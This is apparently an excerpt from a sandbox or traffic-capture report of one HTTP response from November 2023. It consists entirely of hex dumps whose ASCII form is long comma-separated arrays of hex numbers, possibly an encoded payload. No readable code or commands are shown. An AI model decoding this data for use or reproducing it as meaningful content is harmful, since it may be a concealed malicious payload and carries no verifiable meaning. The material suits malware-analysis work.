                                                                                                                                                                      2023-11-06 14:35:15 UTC123INData Raw: 2c 38 38 2c 36 63 2c 34 32 2c 39 34 2c 65 36 2c 63 39 2c 64 34 2c 62 64 2c 64 38 2c 62 30 2c 36 65 2c 35 32 2c 34 31 2c 35 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 64 2c 33 39 2c 37 30 2c 31 30 33 2c 35 61 2c 33 31 2c 34 65 2c 36 63 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 37 37 2c 36 37 2c 36 32 2c 66 38 2c 34 38 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 63 38 2c 34 31 2c 35 31 2c 31 32 33 2c 35 39 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 64 63 2c 33 31 2c 34 65 2c 31 32 63 2c 35 34 2c 35 32 2c 36 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 64 32 2c 37 34 2c 35 61 2c 31 32 64 2c 35 33 2c 37 37 2c 34 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 65 34 2c 36 35 2c 35 38 2c 31 30 36 2c
                                                                                                                                                                      Data Ascii: ,88,6c,42,94,e6,c9,d4,bd,d8,b0,6e,52,41,51,63,55,65,58,46,3d,39,70,103,5a,31,4e,6c,4c,52,6b,54,77,67,62,f8,48,74,5a,6d,4b,77,43,34,c8,41,51,123,59,65,58,46,38,39,70,43,dc,31,4e,12c,54,52,6b,54,5a,67,62,38,d2,74,5a,12d,53,77,43,34,32,41,51,63,e4,65,58,106,
                                                                                                                                                                      2023-11-06 14:35:15 UTC127INData Raw: 2c 64 62 2c 36 38 2c 65 33 2c 33 39 2c 34 35 2c 37 35 2c 35 62 2c 36 65 2c 34 63 2c 37 38 2c 34 34 2c 33 35 2c 33 33 2c 34 32 2c 35 32 2c 36 34 2c 35 36 2c 36 36 2c 35 39 2c 34 37 2c 33 39 2c 33 61 2c 37 31 2c 34 34 2c 35 30 2c 33 32 2c 34 66 2c 36 64 2c 34 64 2c 35 33 2c 36 63 2c 35 35 2c 35 62 2c 36 38 2c 36 33 2c 33 39 2c 34 35 2c 37 35 2c 35 62 2c 36 65 2c 34 63 2c 37 38 2c 34 34 2c 33 35 2c 34 32 2c 34 31 2c 36 31 2c 36 33 2c 36 35 2c 36 35 2c 36 38 2c 34 36 2c 34 38 2c 33 39 2c 38 30 2c 34 33 2c 64 31 2c 33 32 2c 64 30 2c 36 64 2c 63 65 2c 35 33 2c 65 64 2c 35 35 2c 64 63 2c 36 38 2c 65 34 2c 33 39 2c 34 36 2c 37 35 2c 35 63 2c 36 65 2c 34 64 2c 37 38 2c 34 35 2c 33 35 2c 33 34 2c 34 32 2c 35 33 2c 36 34 2c 35 37 2c 36 36 2c 35 61 2c 34 37 2c 33 61
                                                                                                                                                                      Data Ascii: ,db,68,e3,39,45,75,5b,6e,4c,78,44,35,33,42,52,64,56,66,59,47,39,3a,71,44,50,32,4f,6d,4d,53,6c,55,5b,68,63,39,45,75,5b,6e,4c,78,44,35,42,41,61,63,65,65,68,46,48,39,80,43,d1,32,d0,6d,ce,53,ed,55,dc,68,e4,39,46,75,5c,6e,4d,78,45,35,34,42,53,64,57,66,5a,47,3a
                                                                                                                                                                      2023-11-06 14:35:15 UTC131INData Raw: 39 39 2c 61 62 2c 65 39 2c 34 33 2c 39 33 2c 39 36 2c 62 31 2c 36 63 2c 39 61 2c 63 31 2c 65 31 2c 35 34 2c 61 39 2c 63 61 2c 64 36 2c 33 38 2c 39 37 2c 64 39 2c 63 61 2c 36 64 2c 38 63 2c 65 63 2c 61 61 2c 33 34 2c 37 63 2c 62 36 2c 62 64 2c 36 33 2c 39 66 2c 64 61 2c 63 36 2c 34 36 2c 38 35 2c 39 61 2c 65 39 2c 34 33 2c 39 30 2c 61 31 2c 63 30 2c 36 63 2c 39 39 2c 62 33 2c 64 64 2c 35 34 2c 61 30 2c 63 63 2c 63 34 2c 33 38 2c 38 65 2c 64 35 2c 63 38 2c 36 64 2c 39 65 2c 64 38 2c 62 37 2c 61 39 2c 61 34 2c 61 35 2c 62 32 2c 64 63 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 37 65 2c 61 62 2c 64 39 2c 61 37 2c 62 30 2c 61 61 2c 34 65 2c 36 63 2c 61 30 2c 62 61 2c 65 30 2c 63 36 2c 63 64 2c 63 62 2c 63 33 2c 62 31 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 61 32 2c
                                                                                                                                                                      Data Ascii: 99,ab,e9,43,93,96,b1,6c,9a,c1,e1,54,a9,ca,d6,38,97,d9,ca,6d,8c,ec,aa,34,7c,b6,bd,63,9f,da,c6,46,85,9a,e9,43,90,a1,c0,6c,99,b3,dd,54,a0,cc,c4,38,8e,d5,c8,6d,9e,d8,b7,a9,a4,a5,b2,dc,55,65,58,46,7e,ab,d9,a7,b0,aa,4e,6c,a0,ba,e0,c6,cd,cb,c3,b1,44,74,5a,6d,a2,
                                                                                                                                                                      2023-11-06 14:35:15 UTC136INData Raw: 2c 61 65 2c 34 62 2c 37 37 2c 62 31 2c 33 37 2c 38 38 2c 61 61 2c 63 33 2c 64 37 2c 63 61 2c 63 36 2c 63 34 2c 38 37 2c 61 34 2c 61 35 2c 64 66 2c 61 36 2c 34 66 2c 33 31 2c 63 34 2c 36 64 2c 39 33 2c 62 37 2c 64 66 2c 61 31 2c 63 39 2c 63 62 2c 64 37 2c 61 34 2c 61 39 2c 62 63 2c 62 62 2c 64 62 2c 61 66 2c 65 33 2c 61 38 2c 37 35 2c 33 32 2c 34 31 2c 35 33 2c 36 36 2c 61 38 2c 63 61 2c 63 63 2c 38 62 2c 61 36 2c 61 66 2c 64 39 2c 62 35 2c 62 65 2c 39 66 2c 62 62 2c 64 31 2c 62 61 2c 63 36 2c 63 31 2c 62 35 2c 63 63 2c 64 30 2c 63 33 2c 39 61 2c 62 30 2c 64 39 2c 62 31 2c 36 64 2c 31 33 38 2c 37 37 2c 38 39 2c 61 36 2c 39 37 2c 61 36 2c 39 34 2c 64 32 2c 63 33 2c 64 38 2c 63 37 2c 62 32 2c 39 64 2c 33 39 2c 65 32 2c 34 35 2c 39 65 2c 61 31 2c 62 33 2c 64
                                                                                                                                                                      Data Ascii: ,ae,4b,77,b1,37,88,aa,c3,d7,ca,c6,c4,87,a4,a5,df,a6,4f,31,c4,6d,93,b7,df,a1,c9,cb,d7,a4,a9,bc,bb,db,af,e3,a8,75,32,41,53,66,a8,ca,cc,8b,a6,af,d9,b5,be,9f,bb,d1,ba,c6,c1,b5,cc,d0,c3,9a,b0,d9,b1,6d,138,77,89,a6,97,a6,94,d2,c3,d8,c7,b2,9d,39,e2,45,9e,a1,b3,d
                                                                                                                                                                      2023-11-06 14:35:15 UTC140INData Raw: 2c 31 34 62 2c 31 35 65 2c 66 30 2c 31 36 37 2c 31 33 31 2c 31 32 35 2c 39 66 2c 36 35 2c 38 63 2c 62 38 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 36 30 2c 31 32 32 2c 31 33 64 2c 31 35 63 2c 31 33 32 2c 31 34 32 2c 31 32 63 2c 31 34 35 2c 31 34 62 2c 39 38 2c 31 35 31 2c 31 32 39 2c 31 33 35 2c 62 39 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 65 35 2c 35 33 2c 31 34 30 2c 31 35 34 2c 31 34 36 2c 31 33 36 2c 31 34 39 2c 31 33 37 2c 31 32 39 2c 34 61 2c 31 35 66 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 66 66 2c 31 35 64 2c 31 33 64 2c 31 32 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 36 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33
                                                                                                                                                                      Data Ascii: ,14b,15e,f0,167,131,125,9f,65,8c,b8,146,156,149,137,129,12a,161,134,60,122,13d,15c,132,142,12c,145,14b,98,151,129,135,b9,14b,15e,13c,168,134,125,e5,53,140,154,146,136,149,137,129,4a,15f,134,140,122,ff,15d,13d,123,15c,145,14b,156,153,129,131,165,14b,15e,13
                                                                                                                                                                      2023-11-06 14:35:15 UTC143INData Raw: 2c 62 36 2c 36 31 2c 64 35 2c 65 65 2c 65 66 2c 39 36 2c 65 66 2c 31 31 32 2c 36 63 2c 62 61 2c 61 62 2c 62 31 2c 38 63 2c 35 65 2c 31 33 34 2c 31 35 33 2c 34 66 2c 35 63 2c 31 35 33 2c 31 31 35 2c 31 35 33 2c 34 63 2c 31 30 30 2c 31 34 30 2c 38 61 2c 34 66 2c 64 36 2c 36 33 2c 31 32 63 2c 31 34 38 2c 61 64 2c 63 63 2c 31 31 36 2c 36 32 2c 38 34 2c 31 36 32 2c 66 38 2c 31 34 32 2c 38 61 2c 31 34 39 2c 31 35 63 2c 64 38 2c 35 34 2c 31 32 33 2c 65 35 2c 31 33 39 2c 37 30 2c 37 37 2c 38 64 2c 39 34 2c 63 35 2c 37 35 2c 31 32 32 2c 61 65 2c 66 64 2c 31 30 39 2c 35 62 2c 39 39 2c 35 66 2c 35 38 2c 61 65 2c 31 33 32 2c 61 31 2c 31 32 39 2c 36 38 2c 31 32 35 2c 35 61 2c 66 37 2c 36 66 2c 31 32 61 2c 31 30 38 2c 31 32 64 2c 31 33 37 2c 35 32 2c 31 33 34 2c 38 33
                                                                                                                                                                      Data Ascii: ,b6,61,d5,ee,ef,96,ef,112,6c,ba,ab,b1,8c,5e,134,153,4f,5c,153,115,153,4c,100,140,8a,4f,d6,63,12c,148,ad,cc,116,62,84,162,f8,142,8a,149,15c,d8,54,123,e5,139,70,77,8d,94,c5,75,122,ae,fd,109,5b,99,5f,58,ae,132,a1,129,68,125,5a,f7,6f,12a,108,12d,137,52,134,83
                                                                                                                                                                      2023-11-06 14:35:15 UTC147INData Raw: 31 35 37 2c 31 32 38 2c 65 31 2c 36 30 2c 31 33 38 2c 64 62 2c 63 36 2c 65 62 2c 37 32 2c 31 34 64 2c 39 36 2c 61 31 2c 39 35 2c 35 38 2c 38 66 2c 65 33 2c 39 31 2c 37 31 2c 31 33 33 2c 31 35 39 2c 66 35 2c 64 39 2c 62 66 2c 64 36 2c 61 37 2c 62 64 2c 36 31 2c 31 30 63 2c 35 34 2c 64 32 2c 31 33 61 2c 61 36 2c 64 37 2c 35 66 2c 35 66 2c 35 66 2c 64 32 2c 62 38 2c 62 34 2c 39 61 2c 35 34 2c 39 61 2c 39 63 2c 61 61 2c 31 34 33 2c 31 31 61 2c 37 30 2c 31 33 63 2c 37 64 2c 63 62 2c 36 33 2c 64 64 2c 61 65 2c 31 34 64 2c 63 32 2c 31 30 62 2c 62 31 2c 65 30 2c 31 32 62 2c 38 37 2c 31 30 30 2c 37 64 2c 31 35 31 2c 38 39 2c 62 62 2c 31 30 64 2c 33 39 2c 39 63 2c 64 32 2c 36 33 2c 34 66 2c 31 32 33 2c 31 33 65 2c 63 62 2c 63 34 2c 31 30 39 2c 31 32 38 2c 63 37 2c
                                                                                                                                                                      Data Ascii: 157,128,e1,60,138,db,c6,eb,72,14d,96,a1,95,58,8f,e3,91,71,133,159,f5,d9,bf,d6,a7,bd,61,10c,54,d2,13a,a6,d7,5f,5f,5f,d2,b8,b4,9a,54,9a,9c,aa,143,11a,70,13c,7d,cb,63,dd,ae,14d,c2,10b,b1,e0,12b,87,100,7d,151,89,bb,10d,39,9c,d2,63,4f,123,13e,cb,c4,109,128,c7,
                                                                                                                                                                      2023-11-06 14:35:15 UTC151INData Raw: 63 2c 31 33 37 2c 31 30 65 2c 65 34 2c 35 64 2c 62 64 2c 37 35 2c 65 30 2c 31 32 32 2c 65 62 2c 61 36 2c 62 65 2c 61 63 2c 64 64 2c 31 31 64 2c 37 39 2c 65 66 2c 36 36 2c 31 35 63 2c 36 30 2c 36 35 2c 65 38 2c 66 35 2c 36 30 2c 31 32 32 2c 31 30 65 2c 62 62 2c 61 37 2c 66 32 2c 63 65 2c 31 30 31 2c 62 33 2c 64 35 2c 65 31 2c 62 61 2c 31 30 30 2c 31 33 34 2c 31 34 35 2c 62 36 2c 39 63 2c 62 61 2c 62 38 2c 61 30 2c 31 33 39 2c 65 39 2c 31 30 31 2c 63 62 2c 31 32 33 2c 31 34 38 2c 31 30 63 2c 65 30 2c 63 33 2c 63 63 2c 39 38 2c 63 30 2c 33 65 2c 62 36 2c 31 34 31 2c 38 39 2c 64 65 2c 39 30 2c 62 39 2c 31 34 31 2c 63 39 2c 39 61 2c 61 63 2c 31 33 34 2c 31 30 62 2c 38 38 2c 31 32 38 2c 39 37 2c 31 33 63 2c 64 65 2c 63 33 2c 31 30 36 2c 62 31 2c 31 32 61 2c 36
                                                                                                                                                                      Data Ascii: c,137,10e,e4,5d,bd,75,e0,122,eb,a6,be,ac,dd,11d,79,ef,66,15c,60,65,e8,f5,60,122,10e,bb,a7,f2,ce,101,b3,d5,e1,ba,100,134,145,b6,9c,ba,b8,a0,139,e9,101,cb,123,148,10c,e0,c3,cc,98,c0,3e,b6,141,89,de,90,b9,141,c9,9a,ac,134,10b,88,128,97,13c,de,c3,106,b1,12a,6
                                                                                                                                                                      2023-11-06 14:35:15 UTC155INData Raw: 65 37 2c 31 31 35 2c 37 63 2c 64 30 2c 64 66 2c 66 30 2c 39 63 2c 39 61 2c 61 34 2c 34 38 2c 63 34 2c 66 35 2c 62 39 2c 31 32 38 2c 63 38 2c 63 65 2c 66 64 2c 63 37 2c 65 36 2c 37 36 2c 39 65 2c 36 61 2c 39 63 2c 38 37 2c 36 61 2c 31 31 39 2c 34 65 2c 65 63 2c 63 33 2c 61 63 2c 66 64 2c 63 62 2c 39 65 2c 35 38 2c 34 63 2c 31 34 63 2c 35 66 2c 65 34 2c 65 65 2c 38 66 2c 35 34 2c 38 62 2c 37 38 2c 31 30 34 2c 64 64 2c 31 33 36 2c 31 34 61 2c 31 35 38 2c 31 35 37 2c 62 37 2c 61 37 2c 62 39 2c 64 34 2c 66 35 2c 36 33 2c 63 32 2c 63 61 2c 31 33 39 2c 36 30 2c 31 30 63 2c 65 64 2c 39 37 2c 31 30 36 2c 65 63 2c 66 39 2c 37 35 2c 31 31 33 2c 64 61 2c 31 30 39 2c 37 32 2c 31 32 33 2c 66 64 2c 37 63 2c 65 62 2c 37 36 2c 66 33 2c 66 32 2c 31 33 63 2c 62 32 2c 39 31
                                                                                                                                                                      Data Ascii: e7,115,7c,d0,df,f0,9c,9a,a4,48,c4,f5,b9,128,c8,ce,fd,c7,e6,76,9e,6a,9c,87,6a,119,4e,ec,c3,ac,fd,cb,9e,58,4c,14c,5f,e4,ee,8f,54,8b,78,104,dd,136,14a,158,157,b7,a7,b9,d4,f5,63,c2,ca,139,60,10c,ed,97,106,ec,f9,75,113,da,109,72,123,fd,7c,eb,76,f3,f2,13c,b2,91
                                                                                                                                                                      2023-11-06 14:35:15 UTC159INData Raw: 2c 31 30 36 2c 31 33 37 2c 63 38 2c 33 62 2c 65 63 2c 35 36 2c 37 35 2c 37 35 2c 65 33 2c 31 35 66 2c 37 31 2c 63 32 2c 65 31 2c 65 62 2c 61 32 2c 39 35 2c 31 32 37 2c 31 31 63 2c 37 34 2c 66 37 2c 31 32 66 2c 39 38 2c 31 36 33 2c 63 62 2c 31 30 33 2c 61 38 2c 61 38 2c 65 35 2c 38 39 2c 64 61 2c 31 30 65 2c 31 32 63 2c 31 31 65 2c 31 32 38 2c 36 34 2c 62 36 2c 36 65 2c 66 39 2c 35 63 2c 31 32 33 2c 38 35 2c 38 38 2c 66 63 2c 61 64 2c 66 63 2c 31 33 32 2c 39 35 2c 38 33 2c 66 35 2c 33 64 2c 63 35 2c 66 66 2c 35 38 2c 31 34 30 2c 37 63 2c 31 32 33 2c 31 34 64 2c 62 37 2c 63 31 2c 64 35 2c 37 38 2c 64 66 2c 31 32 63 2c 61 33 2c 35 36 2c 61 63 2c 35 36 2c 61 32 2c 35 61 2c 31 33 65 2c 38 61 2c 31 34 31 2c 65 31 2c 39 63 2c 31 32 30 2c 31 31 36 2c 37 36 2c 61
                                                                                                                                                                      Data Ascii: ,106,137,c8,3b,ec,56,75,75,e3,15f,71,c2,e1,eb,a2,95,127,11c,74,f7,12f,98,163,cb,103,a8,a8,e5,89,da,10e,12c,11e,128,64,b6,6e,f9,5c,123,85,88,fc,ad,fc,132,95,83,f5,3d,c5,ff,58,140,7c,123,14d,b7,c1,d5,78,df,12c,a3,56,ac,56,a2,5a,13e,8a,141,e1,9c,120,116,76,a
                                                                                                                                                                      2023-11-06 14:35:15 UTC163INData Raw: 35 62 2c 63 33 2c 62 38 2c 31 32 30 2c 31 30 32 2c 61 35 2c 36 64 2c 61 65 2c 62 36 2c 61 31 2c 38 30 2c 63 37 2c 63 65 2c 31 32 62 2c 61 62 2c 35 38 2c 65 32 2c 64 33 2c 31 30 39 2c 38 31 2c 31 30 61 2c 31 32 36 2c 31 33 37 2c 33 38 2c 38 37 2c 31 34 66 2c 36 38 2c 65 34 2c 34 32 2c 63 33 2c 36 65 2c 31 32 31 2c 63 32 2c 37 35 2c 37 64 2c 63 62 2c 31 33 32 2c 37 35 2c 38 62 2c 31 31 65 2c 31 36 32 2c 64 32 2c 31 31 63 2c 31 34 39 2c 61 37 2c 31 33 34 2c 38 65 2c 65 38 2c 38 64 2c 65 64 2c 61 30 2c 62 64 2c 31 34 37 2c 62 65 2c 39 33 2c 31 30 32 2c 39 33 2c 65 36 2c 64 30 2c 31 31 31 2c 34 66 2c 31 30 63 2c 31 30 30 2c 31 30 34 2c 61 32 2c 31 33 61 2c 62 30 2c 63 61 2c 31 36 31 2c 64 34 2c 61 65 2c 65 61 2c 64 65 2c 61 34 2c 62 31 2c 61 32 2c 31 35 64 2c
                                                                                                                                                                      Data Ascii: 5b,c3,b8,120,102,a5,6d,ae,b6,a1,80,c7,ce,12b,ab,58,e2,d3,109,81,10a,126,137,38,87,14f,68,e4,42,c3,6e,121,c2,75,7d,cb,132,75,8b,11e,162,d2,11c,149,a7,134,8e,e8,8d,ed,a0,bd,147,be,93,102,93,e6,d0,111,4f,10c,100,104,a2,13a,b0,ca,161,d4,ae,ea,de,a4,b1,a2,15d,
                                                                                                                                                                      2023-11-06 14:35:15 UTC168INData Raw: 2c 66 65 2c 37 38 2c 39 64 2c 31 32 63 2c 31 30 61 2c 31 35 34 2c 31 31 65 2c 35 34 2c 35 64 2c 31 35 63 2c 66 34 2c 61 61 2c 63 62 2c 38 62 2c 66 66 2c 66 61 2c 39 61 2c 65 65 2c 37 35 2c 31 31 37 2c 62 37 2c 36 37 2c 62 30 2c 64 32 2c 66 37 2c 31 32 38 2c 31 30 64 2c 61 31 2c 31 31 31 2c 64 64 2c 37 30 2c 31 30 62 2c 37 34 2c 64 61 2c 61 66 2c 35 62 2c 31 34 38 2c 63 32 2c 37 38 2c 37 65 2c 61 38 2c 31 30 65 2c 31 32 32 2c 65 65 2c 61 30 2c 37 31 2c 66 31 2c 66 31 2c 61 30 2c 31 31 66 2c 38 30 2c 64 62 2c 38 30 2c 31 33 30 2c 63 62 2c 64 66 2c 61 37 2c 31 35 38 2c 65 62 2c 37 34 2c 63 61 2c 31 32 62 2c 61 66 2c 37 30 2c 31 31 31 2c 39 33 2c 31 34 61 2c 61 64 2c 36 38 2c 38 32 2c 35 64 2c 39 34 2c 61 65 2c 31 35 61 2c 64 38 2c 37 30 2c 37 39 2c 31 30 62
                                                                                                                                                                      Data Ascii: ,fe,78,9d,12c,10a,154,11e,54,5d,15c,f4,aa,cb,8b,ff,fa,9a,ee,75,117,b7,67,b0,d2,f7,128,10d,a1,111,dd,70,10b,74,da,af,5b,148,c2,78,7e,a8,10e,122,ee,a0,71,f1,f1,a0,11f,80,db,80,130,cb,df,a7,158,eb,74,ca,12b,af,70,111,93,14a,ad,68,82,5d,94,ae,15a,d8,70,79,10b
                                                                                                                                                                      2023-11-06 14:35:15 UTC172INData Raw: 30 2c 31 30 35 2c 31 30 37 2c 38 30 2c 36 66 2c 64 30 2c 31 35 35 2c 36 36 2c 31 31 38 2c 31 32 30 2c 31 31 64 2c 66 39 2c 31 34 62 2c 64 39 2c 36 36 2c 61 63 2c 61 63 2c 66 38 2c 37 31 2c 64 30 2c 36 62 2c 65 30 2c 37 31 2c 35 63 2c 31 30 36 2c 31 30 34 2c 31 34 65 2c 38 32 2c 64 39 2c 31 34 31 2c 31 32 64 2c 34 34 2c 31 31 64 2c 63 34 2c 36 39 2c 65 61 2c 38 34 2c 63 64 2c 36 36 2c 65 33 2c 31 33 36 2c 65 32 2c 31 31 65 2c 36 63 2c 31 32 66 2c 36 39 2c 31 30 36 2c 62 64 2c 38 34 2c 66 31 2c 37 39 2c 35 37 2c 38 32 2c 31 30 65 2c 66 65 2c 64 62 2c 31 32 32 2c 31 32 30 2c 31 34 61 2c 31 30 37 2c 39 39 2c 31 37 32 2c 63 63 2c 36 37 2c 66 65 2c 66 34 2c 31 30 39 2c 31 33 64 2c 31 32 63 2c 31 35 62 2c 36 63 2c 65 37 2c 35 64 2c 38 63 2c 66 33 2c 37 34 2c 31
                                                                                                                                                                      Data Ascii: 0,105,107,80,6f,d0,155,66,118,120,11d,f9,14b,d9,66,ac,ac,f8,71,d0,6b,e0,71,5c,106,104,14e,82,d9,141,12d,44,11d,c4,69,ea,84,cd,66,e3,136,e2,11e,6c,12f,69,106,bd,84,f1,79,57,82,10e,fe,db,122,120,14a,107,99,172,cc,67,fe,f4,109,13d,12c,15b,6c,e7,5d,8c,f3,74,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC175INData Raw: 62 2c 31 32 33 2c 31 33 32 2c 31 33 63 2c 31 32 61 2c 39 34 2c 31 35 34 2c 63 65 2c 31 30 62 2c 31 32 39 2c 31 32 61 2c 31 35 64 2c 31 31 34 2c 36 36 2c 39 61 2c 64 66 2c 31 34 32 2c 31 31 32 2c 31 34 33 2c 31 33 34 2c 31 33 66 2c 31 34 62 2c 31 35 38 2c 31 32 38 2c 31 30 39 2c 66 34 2c 31 31 65 2c 31 31 63 2c 65 63 2c 31 31 34 2c 31 35 61 2c 31 33 34 2c 31 32 35 2c 66 38 2c 62 66 2c 62 39 2c 31 35 34 2c 31 34 36 2c 31 34 63 2c 31 32 31 2c 63 61 2c 31 32 39 2c 31 32 61 2c 31 35 37 2c 31 30 63 2c 31 30 36 2c 31 32 32 2c 31 33 66 2c 31 35 37 2c 31 31 33 2c 64 35 2c 31 35 61 2c 63 61 2c 31 31 66 2c 31 35 38 2c 31 35 33 2c 31 32 35 2c 31 31 35 2c 31 32 36 2c 37 39 2c 31 35 36 2c 31 31 65 2c 31 34 30 2c 31 31 64 2c 31 32 35 2c 31 32 33 2c 31 30 37 2c 63 66 2c
                                                                                                                                                                      Data Ascii: b,123,132,13c,12a,94,154,ce,10b,129,12a,15d,114,66,9a,df,142,112,143,134,13f,14b,158,128,109,f4,11e,11c,ec,114,15a,134,125,f8,bf,b9,154,146,14c,121,ca,129,12a,157,10c,106,122,13f,157,113,d5,15a,ca,11f,158,153,125,115,126,79,156,11e,140,11d,125,123,107,cf,
                                                                                                                                                                      2023-11-06 14:35:15 UTC179INData Raw: 31 34 39 2c 31 32 64 2c 31 30 31 2c 31 30 30 2c 31 36 30 2c 31 33 34 2c 31 33 36 2c 66 61 2c 38 66 2c 31 35 63 2c 31 33 64 2c 31 33 64 2c 31 33 34 2c 38 61 2c 31 34 62 2c 31 35 38 2c 31 34 39 2c 31 30 31 2c 64 33 2c 31 36 35 2c 31 34 62 2c 31 35 38 2c 31 31 63 2c 39 64 2c 65 37 2c 62 32 2c 62 39 2c 31 30 37 2c 31 34 32 2c 31 32 63 2c 31 34 32 2c 31 35 36 2c 31 34 39 2c 31 30 63 2c 61 62 2c 63 61 2c 31 36 31 2c 31 33 34 2c 31 33 36 2c 62 33 2c 64 65 2c 31 35 64 2c 31 33 64 2c 31 33 39 2c 31 33 34 2c 62 39 2c 31 34 39 2c 31 35 38 2c 31 34 64 2c 31 32 39 2c 31 30 62 2c 31 31 37 2c 31 34 62 2c 31 35 61 2c 31 31 34 2c 64 31 2c 31 33 32 2c 31 32 35 2c 31 31 64 2c 31 30 61 2c 39 33 2c 31 35 33 2c 31 34 36 2c 31 35 30 2c 64 61 2c 66 39 2c 31 32 37 2c 31 32 61 2c
                                                                                                                                                                      Data Ascii: 149,12d,101,100,160,134,136,fa,8f,15c,13d,13d,134,8a,14b,158,149,101,d3,165,14b,158,11c,9d,e7,b2,b9,107,142,12c,142,156,149,10c,ab,ca,161,134,136,b3,de,15d,13d,139,134,b9,149,158,14d,129,10b,117,14b,15a,114,d1,132,125,11d,10a,93,153,146,150,da,f9,127,12a,
                                                                                                                                                                      2023-11-06 14:35:15 UTC183INData Raw: 64 2c 31 35 62 2c 31 33 61 2c 63 36 2c 31 36 61 2c 31 34 35 2c 31 34 62 2c 31 35 34 2c 31 32 39 2c 31 30 62 2c 31 33 33 2c 65 61 2c 31 35 38 2c 31 35 65 2c 31 33 63 2c 31 36 34 2c 31 30 61 2c 31 30 33 2c 31 32 31 2c 31 32 66 2c 63 35 2c 31 36 31 2c 31 34 36 2c 31 35 36 2c 31 34 35 2c 31 30 64 2c 31 30 62 2c 31 32 38 2c 65 36 2c 31 34 30 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 33 33 2c 31 31 62 2c 31 34 31 2c 31 35 39 2c 63 38 2c 31 35 37 2c 31 35 38 2c 31 35 33 2c 31 32 35 2c 31 30 62 2c 31 34 37 2c 31 34 39 2c 65 33 2c 31 34 37 2c 31 36 38 2c 31 33 34 2c 31 32 31 2c 66 39 2c 31 31 30 2c 31 34 30 2c 31 35 31 2c 63 39 2c 31 36 31 2c 31 34 39 2c 31 33 37 2c 31 32 35 2c 31 30 30 2c 31 34 33 2c 31 33 32 2c 63 35 2c 31 32 63 2c 31 33 66 2c 31 35 64 2c 31 33
                                                                                                                                                                      Data Ascii: d,15b,13a,c6,16a,145,14b,154,129,10b,133,ea,158,15e,13c,164,10a,103,121,12f,c5,161,146,156,145,10d,10b,128,e6,140,140,122,13b,133,11b,141,159,c8,157,158,153,125,10b,147,149,e3,147,168,134,121,f9,110,140,151,c9,161,149,137,125,100,143,132,c5,12c,13f,15d,13
                                                                                                                                                                      2023-11-06 14:35:15 UTC187INData Raw: 39 2c 31 32 62 2c 31 35 36 2c 31 34 61 2c 31 33 36 2c 31 31 37 2c 31 36 36 2c 31 33 34 2c 31 31 62 2c 31 31 34 2c 31 33 31 2c 31 31 61 2c 31 33 30 2c 31 34 34 2c 31 35 36 2c 31 33 66 2c 31 32 38 2c 31 32 37 2c 31 30 32 2c 39 37 2c 31 33 33 2c 31 34 30 2c 31 31 38 2c 65 37 2c 31 34 65 2c 31 33 63 2c 31 31 62 2c 31 33 37 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 34 34 2c 31 32 37 2c 31 30 64 2c 39 61 2c 31 34 61 2c 31 35 65 2c 31 33 32 2c 31 31 30 2c 31 30 63 2c 37 30 2c 31 32 31 2c 31 33 32 2c 31 33 63 2c 31 35 34 2c 31 34 36 2c 31 32 63 2c 62 33 2c 31 33 35 2c 31 31 61 2c 31 32 39 2c 31 33 39 2c 31 30 65 2c 31 33 65 2c 31 32 32 2c 31 33 35 2c 31 34 65 2c 31 33 63 2c 31 31 62 2c 31 33 35 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 34 34 2c 31 32 38 2c 31 30
                                                                                                                                                                      Data Ascii: 9,12b,156,14a,136,117,166,134,11b,114,131,11a,130,144,156,13f,128,127,102,97,133,140,118,e7,14e,13c,11b,137,143,14b,14e,144,127,10d,9a,14a,15e,132,110,10c,70,121,132,13c,154,146,12c,b3,135,11a,129,139,10e,13e,122,135,14e,13c,11b,135,143,14b,14e,144,128,10
                                                                                                                                                                      2023-11-06 14:35:15 UTC191INData Raw: 31 34 34 2c 31 35 33 2c 31 32 31 2c 31 32 38 2c 31 32 39 2c 31 32 61 2c 31 35 37 2c 31 33 34 2c 31 33 65 2c 66 61 2c 66 33 2c 31 35 62 2c 31 33 64 2c 31 33 39 2c 31 33 36 2c 31 34 33 2c 31 32 33 2c 31 31 39 2c 31 35 31 2c 31 32 39 2c 31 32 62 2c 31 36 35 2c 31 32 31 2c 63 30 2c 31 33 63 2c 31 36 36 2c 31 30 63 2c 31 30 62 2c 31 32 33 2c 31 33 32 2c 31 33 38 2c 31 35 34 2c 31 34 34 2c 31 35 34 2c 31 32 31 2c 61 62 2c 31 32 37 2c 31 32 61 2c 31 35 37 2c 63 35 2c 66 32 2c 31 32 30 2c 31 33 66 2c 31 35 33 2c 31 31 64 2c 62 38 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 66 66 2c 31 33 64 2c 62 36 2c 63 36 2c 31 36 34 2c 31 34 62 2c 31 35 34 2c 31 31 34 2c 66 38 2c 31 33 33 2c 31 32 35 2c 31 31 39 2c 31 33 32 2c 31 31 38 2c 31 30 65 2c 31 34 36 2c 31 35 34 2c 31 34
                                                                                                                                                                      Data Ascii: 144,153,121,128,129,12a,157,134,13e,fa,f3,15b,13d,139,136,143,123,119,151,129,12b,165,121,c0,13c,166,10c,10b,123,132,138,154,144,154,121,ab,127,12a,157,c5,f2,120,13f,153,11d,b8,15c,145,14b,ff,13d,b6,c6,164,14b,154,114,f8,133,125,119,132,118,10e,146,154,14
